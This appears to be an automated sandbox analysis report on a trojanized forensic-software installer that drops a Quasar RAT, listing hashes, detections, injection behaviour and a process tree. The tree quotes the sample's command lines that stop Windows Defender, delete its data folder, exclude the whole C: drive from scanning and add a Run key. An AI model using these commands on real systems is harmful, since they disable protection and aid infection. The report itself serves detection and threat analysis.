Analysis

max time kernel: 313s
max time network: 318s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12-11-2024 22:44
Static task: static1

Behavioral task: behavioral1
  Sample: Passware Kit Forensic 2021 Pre-patched retail installer.exe
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: Passware Kit Forensic 2021 Pre-patched retail installer.exe
  Resource: win10v2004-20241007-en
General

Target: Passware Kit Forensic 2021 Pre-patched retail installer.exe
Size: 381.5MB
MD5: 298faa0669e7d439d1ba4a3d641cc619
SHA1: 093f271f3c1b4b6e6b948ee61b01ac2c7c02a0fd
SHA256: 344b9876db6b8649b9d65448a715b1923011ea9146e116908eb4d35bd8fa3af6
SHA512: 0cca0f0e1f1fae77eba6f438ce53c9542811533d9015a24bebaf4fce4ba936a7642c51f25bec74171e60591f10d8bdf7f76e8e49f27e640209b81bdfcfcbda01
SSDEEP: 6291456:hVqIbo0MM0kYOnyEBVToKg+IKiwA4kB88xU+WDyb/B/22aMBb7WDnexkq50NguO2:6Is0XRBV3LR4B8vm/hqMdWLeW00NgBa
Malware Config
Signatures

Quasar family

Quasar payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/800-71-0x0000000000400000-0x0000000000466000-memory.dmp | family_quasar
Detected Nirsoft tools (1 IoC)
Free utilities often used by attackers which can steal passwords, product keys, etc.
  resource | yara_rule
  behavioral2/files/0x00020000000220f4-41.dat | Nirsoft
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | Process
  3616 | powershell.exe
System Binary Proxy Execution: Regsvcs/Regasm (1 TTP, 2 IoCs)
Abuse Regasm to proxy execution of malicious code.
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | ConsoleApp3.exe
  Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | ConsoleApp3.exe
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | ConsoleApp3.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | RegAsm.exe
Executes dropped EXE (7 IoCs)
  pid | Process
  4184 | Passware Kit Forensic 2021 Pre-patched retail installer.exe
  1476 | ConsoleApp3.exe
  4868 | AdvancedRun.exe
  1872 | AdvancedRun.exe
  3768 | RegAsm.exe
  800 | RegAsm.exe
  3992 | RegAsm.exe
Loads dropped DLL (2 IoCs)
  pid | Process
  1884 | MsiExec.exe
  1884 | MsiExec.exe
Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KitForensic = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Passware Kit Forensic\\KitForensic.exe\"" | ConsoleApp3.exe
Blocklisted process makes network request (2 IoCs)
  flow | pid | Process
  19 | 2988 | msiexec.exe
  21 | 2988 | msiexec.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
  description | ioc | Process
  File opened (read-only) | \??\J: | msiexec.exe
  File opened (read-only) | \??\M: | msiexec.exe
  File opened (read-only) | \??\P: | msiexec.exe
  File opened (read-only) | \??\S: | msiexec.exe
  File opened (read-only) | \??\N: | msiexec.exe
  File opened (read-only) | \??\B: | msiexec.exe
  File opened (read-only) | \??\G: | msiexec.exe
  File opened (read-only) | \??\I: | msiexec.exe
  File opened (read-only) | \??\S: | msiexec.exe
  File opened (read-only) | \??\U: | msiexec.exe
  File opened (read-only) | \??\Y: | msiexec.exe
  File opened (read-only) | \??\I: | msiexec.exe
  File opened (read-only) | \??\P: | msiexec.exe
  File opened (read-only) | \??\Y: | msiexec.exe
  File opened (read-only) | \??\X: | msiexec.exe
  File opened (read-only) | \??\Q: | msiexec.exe
  File opened (read-only) | \??\Z: | msiexec.exe
  File opened (read-only) | \??\B: | msiexec.exe
  File opened (read-only) | \??\G: | msiexec.exe
  File opened (read-only) | \??\Q: | msiexec.exe
  File opened (read-only) | \??\U: | msiexec.exe
  File opened (read-only) | \??\V: | msiexec.exe
  File opened (read-only) | \??\W: | msiexec.exe
  File opened (read-only) | \??\E: | msiexec.exe
  File opened (read-only) | \??\H: | msiexec.exe
  File opened (read-only) | \??\N: | msiexec.exe
  File opened (read-only) | \??\W: | msiexec.exe
  File opened (read-only) | \??\X: | msiexec.exe
  File opened (read-only) | \??\H: | msiexec.exe
  File opened (read-only) | \??\J: | msiexec.exe
  File opened (read-only) | \??\A: | msiexec.exe
  File opened (read-only) | \??\K: | msiexec.exe
  File opened (read-only) | \??\T: | msiexec.exe
  File opened (read-only) | \??\V: | msiexec.exe
  File opened (read-only) | \??\L: | msiexec.exe
  File opened (read-only) | \??\O: | msiexec.exe
  File opened (read-only) | \??\R: | msiexec.exe
  File opened (read-only) | \??\A: | msiexec.exe
  File opened (read-only) | \??\K: | msiexec.exe
  File opened (read-only) | \??\Z: | msiexec.exe
  File opened (read-only) | \??\O: | msiexec.exe
  File opened (read-only) | \??\E: | msiexec.exe
  File opened (read-only) | \??\M: | msiexec.exe
  File opened (read-only) | \??\T: | msiexec.exe
  File opened (read-only) | \??\L: | msiexec.exe
  File opened (read-only) | \??\R: | msiexec.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  41 | ip-api.com
Drops file in System32 directory (64 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\ws2_32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\kernelbase.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\sechost.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\winspool.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\bcryptprimitives.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\msvcp_win.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\dbghelp.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\shcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\userenv.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\DLL\AcLayers.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\rpcrt4.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\bcrypt.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\comctl32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\win32u.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\win32u.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\shlwapi.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\apphelp.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\bcrypt.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\DLL\sfc_os.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\DLL\comctl32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\shcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\UxTheme.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\kernel32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\msvcp_win.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\advapi32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\Kernel.Appcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\advapi32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\DLL\imm32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\ole32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\tmp\WixPassware64Standalone.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\UxTheme.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\ntdll.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\win32u.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\shell32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\CLBCatQ.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\msi.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\propsys.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\msiexec.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\gdi32full.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\sfc.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dbghelp.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\userenv.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\propsys.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\kernelbase.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\msvcrt.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\msvcp_win.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\combase.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\DLL\dbgcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\ntdll.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\rpcrt4.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\ole32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\tmp\WixPassware64Standalone.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\DLL\dbgcore.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\profapi.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\user32.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\gdi32full.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\DRV\winspool.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\dll\sechost.pdb | MsiExec.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\System32\apphelp.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\sechost.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\profapi.pdb | MsiExec.exe
  File opened for modification | C:\Windows\System32\symbols\dll\gdi32.pdb | MsiExec.exe
Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 1476 set thread context of 800 | 1476 | ConsoleApp3.exe | 114
Launches sc.exe (1 IoC)
Sc.exe is a Windows utility to control services on the system.
  pid | Process
  5060 | sc.exe
Access Token Manipulation: Create Process with Token (1 TTP, 2 IoCs)
  pid | Process
  4868 | AdvancedRun.exe
  1872 | AdvancedRun.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  pid | pid_target | Process | procid_target
  4048 | 800 | WerFault.exe | 114
System Location Discovery: System Language Discovery (1 TTP, 11 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | AdvancedRun.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | AdvancedRun.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | chcp.com
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | PING.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Passware Kit Forensic 2021 Pre-patched retail installer.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | ConsoleApp3.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe
System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 1 IoC)
Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  3164 | PING.EXE
Modifies data under HKEY_USERS (41 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Modifies registry class (1 IoC)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings | ConsoleApp3.exe
Runs ping.exe (1 TTP, 1 IoC)
  pid | Process
  3164 | PING.EXE
Suspicious behavior: EnumeratesProcesses (37 IoCs)
  pid | Process (repeated rows collapsed, count in parentheses)
  4868 | AdvancedRun.exe (x4)
  1872 | AdvancedRun.exe (x4)
  836 | powershell.exe (x2)
  1476 | ConsoleApp3.exe (x25)
  3616 | powershell.exe (x2)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 2988 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2988 | msiexec.exe
  Token: SeSecurityPrivilege | 5008 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2988 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2988 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2988 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2988 | msiexec.exe
  Token: SeMachineAccountPrivilege | 2988 | msiexec.exe
  Token: SeTcbPrivilege | 2988 | msiexec.exe
  Token: SeSecurityPrivilege | 2988 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2988 | msiexec.exe
  Token: SeLoadDriverPrivilege | 2988 | msiexec.exe
  Token: SeSystemProfilePrivilege | 2988 | msiexec.exe
  Token: SeSystemtimePrivilege | 2988 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 2988 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 2988 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 2988 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 2988 | msiexec.exe
  Token: SeBackupPrivilege | 2988 | msiexec.exe
  Token: SeRestorePrivilege | 2988 | msiexec.exe
  Token: SeShutdownPrivilege | 2988 | msiexec.exe
  Token: SeDebugPrivilege | 2988 | msiexec.exe
  Token: SeAuditPrivilege | 2988 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 2988 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 2988 | msiexec.exe
  Token: SeRemoteShutdownPrivilege | 2988 | msiexec.exe
  Token: SeUndockPrivilege | 2988 | msiexec.exe
  Token: SeSyncAgentPrivilege | 2988 | msiexec.exe
  Token: SeEnableDelegationPrivilege | 2988 | msiexec.exe
  Token: SeManageVolumePrivilege | 2988 | msiexec.exe
  Token: SeImpersonatePrivilege | 2988 | msiexec.exe
  Token: SeCreateGlobalPrivilege | 2988 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2988 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2988 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2988 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2988 | msiexec.exe
  Token: SeMachineAccountPrivilege | 2988 | msiexec.exe
  Token: SeTcbPrivilege | 2988 | msiexec.exe
  Token: SeSecurityPrivilege | 2988 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2988 | msiexec.exe
  Token: SeLoadDriverPrivilege | 2988 | msiexec.exe
  Token: SeSystemProfilePrivilege | 2988 | msiexec.exe
  Token: SeSystemtimePrivilege | 2988 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 2988 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 2988 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 2988 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 2988 | msiexec.exe
  Token: SeBackupPrivilege | 2988 | msiexec.exe
  Token: SeRestorePrivilege | 2988 | msiexec.exe
  Token: SeShutdownPrivilege | 2988 | msiexec.exe
  Token: SeDebugPrivilege | 2988 | msiexec.exe
  Token: SeAuditPrivilege | 2988 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 2988 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 2988 | msiexec.exe
  Token: SeRemoteShutdownPrivilege | 2988 | msiexec.exe
  Token: SeUndockPrivilege | 2988 | msiexec.exe
  Token: SeSyncAgentPrivilege | 2988 | msiexec.exe
  Token: SeEnableDelegationPrivilege | 2988 | msiexec.exe
  Token: SeManageVolumePrivilege | 2988 | msiexec.exe
  Token: SeImpersonatePrivilege | 2988 | msiexec.exe
  Token: SeCreateGlobalPrivilege | 2988 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2988 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2988 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2988 | msiexec.exe
Suspicious use of FindShellTrayWindow (10 IoCs)
  pid | Process (repeated rows collapsed, count in parentheses)
  4512 | Passware Kit Forensic 2021 Pre-patched retail installer.exe (x7)
  2988 | msiexec.exe
  4512 | Passware Kit Forensic 2021 Pre-patched retail installer.exe (x2)
Suspicious use of SendNotifyMessage (9 IoCs)
  pid | Process (repeated rows collapsed, count in parentheses)
  4512 | Passware Kit Forensic 2021 Pre-patched retail installer.exe (x9)
Suspicious use of SetWindowsHookEx (1 IoC)
  pid | Process
  800 | RegAsm.exe
Suspicious use of WriteProcessMemory (44 IoCs)
  description | pid | Process | procid_target (repeated rows collapsed, count in parentheses)
  PID 4512 wrote to memory of 4184 | 4512 | Passware Kit Forensic 2021 Pre-patched retail installer.exe | 95 (x2)
  PID 4184 wrote to memory of 2988 | 4184 | Passware Kit Forensic 2021 Pre-patched retail installer.exe | 96 (x2)
  PID 5008 wrote to memory of 1884 | 5008 | msiexec.exe | 100 (x2)
  PID 4512 wrote to memory of 1476 | 4512 | Passware Kit Forensic 2021 Pre-patched retail installer.exe | 97 (x3)
  PID 1476 wrote to memory of 4868 | 1476 | ConsoleApp3.exe | 103 (x3)
  PID 1476 wrote to memory of 1872 | 1476 | ConsoleApp3.exe | 107 (x3)
  PID 1476 wrote to memory of 3064 | 1476 | ConsoleApp3.exe | 110 (x3)
  PID 3064 wrote to memory of 3616 | 3064 | WScript.exe | 111 (x3)
  PID 1476 wrote to memory of 3768 | 1476 | ConsoleApp3.exe | 113 (x3)
  PID 1476 wrote to memory of 800 | 1476 | ConsoleApp3.exe | 114 (x8)
  PID 800 wrote to memory of 2228 | 800 | RegAsm.exe | 115 (x3)
  PID 2228 wrote to memory of 4804 | 2228 | cmd.exe | 118 (x3)
  PID 2228 wrote to memory of 3164 | 2228 | cmd.exe | 120 (x3)
  PID 2228 wrote to memory of 3992 | 2228 | cmd.exe | 122 (x3)
Processes

C:\Users\Admin\AppData\Local\Temp\Passware Kit Forensic 2021 Pre-patched retail installer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Passware Kit Forensic 2021 Pre-patched retail installer.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 4512

  C:\Users\Admin\AppData\Local\Temp\NvTelemetry\Passware Kit Forensic 2021 Pre-patched retail installer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\NvTelemetry\Passware Kit Forensic 2021 Pre-patched retail installer.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 4184

    C:\Windows\SYSTEM32\msiexec.exe
      Command line: msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI124.tmp
      - Blocklisted process makes network request
      - Enumerates connected drives
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      PID: 2988

  C:\Users\Admin\AppData\Local\Temp\NvTelemetry\ConsoleApp3.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\NvTelemetry\ConsoleApp3.exe
    - System Binary Proxy Execution: Regsvcs/Regasm
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 1476

    C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
      - Executes dropped EXE
      - Access Token Manipulation: Create Process with Token
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      PID: 4868

      C:\Windows\System32\sc.exe
        Command line: "C:\Windows\System32\sc.exe" stop WinDefend
        - Launches sc.exe
        PID: 5060

    C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
      - Executes dropped EXE
      - Access Token Manipulation: Create Process with Token
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      PID: 1872

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        PID: 836

    C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Mjtbwkkhvk.vbs"
      - Checks computer location settings
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 3064

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Passware Kit Forensic\KitForensic.exe'
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        PID: 3616

    C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
      - Executes dropped EXE
      PID: 3768

    C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
      - Checks computer location settings
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 800

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bDYTxC3TXHqe.bat" "
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2228

        C:\Windows\SysWOW64\chcp.com
          Command line: chcp 65001
          - System Location Discovery: System Language Discovery
          PID: 4804

        C:\Windows\SysWOW64\PING.EXE
          Command line: ping -n 10 localhost
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
          PID: 3164

        C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          PID: 3992

      C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 2040
        - Program crash
        PID: 4048

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
